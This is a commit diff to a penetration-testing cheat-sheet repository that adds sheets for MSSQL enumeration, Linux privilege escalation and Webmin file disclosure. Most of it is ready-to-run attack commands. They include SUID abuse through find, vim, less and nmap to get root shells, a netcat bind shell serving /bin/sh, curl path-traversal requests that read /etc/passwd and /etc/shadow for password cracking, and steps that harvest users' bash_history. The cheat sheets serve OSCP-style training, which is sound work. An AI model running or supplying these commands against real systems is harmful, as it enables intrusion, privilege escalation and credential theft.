priv escalation and new tricks

CheatSheets/MSSQL/readme.md

@@ -0,0 +1,5 @@
+# MS SQL
+
+### Nmap Information Gathering
+
+`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`

CheatSheets/pos_xpl/readme.md → CheatSheets/linux/pos_xpl/readme.md

@@ -1,12 +1,9 @@
 # Post-Exploitation on Linux
 
-## Data Harversting and Services Enumeration
-
 ### Common users
 
 `awk -F: '{ if($3 >= 1000) print $1}' passwd >> users` 
 
-
 ### Reading bash_history files
 
 Mapping users directories
@@ -17,9 +14,10 @@ Reading files
 
 `for user in $(cat home_users); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done`
 
-
 ### Using great scripts
 
+LinEnu.sh
+
 wget [LinEnum.sh](https://raw.githubusercontent.com/kitsun3sec/Pentest-Cheat-Sheets/master/CheatSheets/pos_xpl/LinEnum.sh)
 
 #### Upload it to the target and run through terminal
@@ -29,5 +27,4 @@ wget [LinEnum.sh](https://raw.githubusercontent.com/kitsun3sec/Pentest-Cheat-She
 > ./LinEnum.sh -t
 ```
 
-#### Done, now pay attention to the output and see if there is anything *interesting*
-
+#### Done, now pay attention to the output and see if there is anything *interesting*

CheatSheets/linux/priv_esc/readme.md

@@ -0,0 +1,78 @@
+
+# Privillege Escalation
+
+### List all SUID files 
+
+`find / -perm -4000 2>/dev/null`
+
+`find / -user root -perm -4000 -print 2>/dev/null`
+
+`find / -perm -u=s -type f 2>/dev/null`
+
+`find / -user root -perm -4000 -exec ls -ldb {} \;`
+
+Nmap version [2.02 - 5.21]
+
+`nmap -V`
+
+`nmap --interactive`
+
+`nmap> !sh`
+
+
+### Performing privilege escalation by misconfigured SUID
+
+#### Find
+
+`touch kitsun3sec`
+`find kitsun3sec -exec whoami \;`
+
+if root
+
+`find kitsun3sec -exec netcat -lvp 5555 -e /bin/sh \;`
+
+#### vim.tiny 
+
+` vim.tiny /etc/shadow `
+
+```
+vim.tiny
+# Press ESC key
+:set shell=/bin/sh
+:shell
+```
+
+#### Bash
+
+`bash -p`
+
+`whoami`
+
+#### Less
+
+```
+less /etc/passwd
+!/bin/sh
+```
+
+### Listing process
+
+`ps aux`
+
+`ps xaf`
+
+### Determine the current version of Linux 
+
+`cat /etc/issue`
+
+`lsb_release -a`
+
+### Determine more information about the environment
+
+`uname -a`
+
+## Searchsploit
+
+`searchsploit linux 2.6`
+
+`searchsploit centos 6`

CheatSheets/webmin/readme.md

@@ -0,0 +1,21 @@
+# Webmin
+
+`export ip=172.20.10.5`
+
+### Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
+
+Some servers can change root path, just change the URL path...
+
+`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
+
+### Test to see if webmin is running as root by grabbing /etc/shadow
+
+`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
+
+
+## You can use John to break it
+
+unshadow passwd shadow > Hash
+
+### Resources
+* [CVE: CVE-2006-3392](https://www.exploit-db.com/exploits/2017/)

README.md

@@ -17,13 +17,16 @@ This repo also helps who trying to get OSCP. You'll find many ways to do somethi
   * [RPC](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/RPC)
   * [NFS](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/NFS)
   * [MySQL](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/mysql)
+  * [MS SQL](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/MSSQL)
 * Exploitation
   * System-Network
     * [RDP](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/RDP)
     * [Pass-the-hash](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/pass_the_hash/)
     * [Windows-shell](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/shell)
   * WEB
       * [Web-Remote-Code-Execution](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/RCE)
+      * LFI
+          * [WEBMIN](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/webmin)
       * [encode](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/encode)
       * [XSS](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/XSS)
       * [SQLI](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/SQLI)
@@ -32,9 +35,10 @@ This repo also helps who trying to get OSCP. You'll find many ways to do somethi
 * Post-Exploitation
     * [SSH](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/ssh/)
     * Linux
-        * [Data Harversting and enumeration](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/pos_xpl/)
+        * [Privilege Escalation](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/linux/priv_esc/)
+        * [Data Harversting and enumeration](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/linux/pos_xpl/)
     * Windows
-        * [Windows/Privilege-Escalation](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/priv_esc/)
+        * [Privilege-Escalation](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/priv_esc/)
         * [HASHDUMP](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/hashdump/)
         * [Transferring Files Without Metasploit](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/transf-file/readme.md)
 * Pivoting